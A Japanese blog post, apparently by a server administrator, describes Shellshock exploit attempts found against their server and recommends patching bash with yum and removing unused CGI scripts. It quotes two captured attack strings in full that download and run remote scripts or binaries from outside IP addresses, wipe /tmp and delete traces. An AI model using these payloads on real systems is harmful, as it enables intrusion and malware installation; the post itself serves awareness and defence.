攻撃まとめ

• perlが使えることを確認したら、（たぶん）的当に用意したサーバに悪用のスクリプトを配置して、それを攻撃するサーバのwgetコマンドを使用して読み込ませて、実行する。その後、痕跡を隠すため、スクリプトファイル削除

"() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://202.191.121.230/ou.pl -O /tmp/b.pl;curl -O /tmp/b.pl http://202.191.121.230/ou.pl;perl /tmp/b.pl;rm -rf /tmp/b.pl*\");'

• これは多すぎて読む気無くす・・・・「China」って、おいおい（わざとかな？）

() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-bsec >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-bsec >> /tmp/Run.sh;echo /tmp/China.Z-bsec >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"

（すぐできる）対応策

パッチはすでにでていますので、下記を実行してあげれば問題ないかと

$ yum update bash

感想

怖い！！！　ネット怖い！！！　((((；ﾟДﾟ))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

最近公開したサーバ、また yum のupdateを対応していたので、大事には至らないようでしたが、これは怖いなぁ。

あと、攻撃口にもなり得る、cgiやスクリプトなどは使わないのなら削除しましょう。

www.ipa.go.jp

サーバ管理者はここを毎日確認したほうがいいかも。。。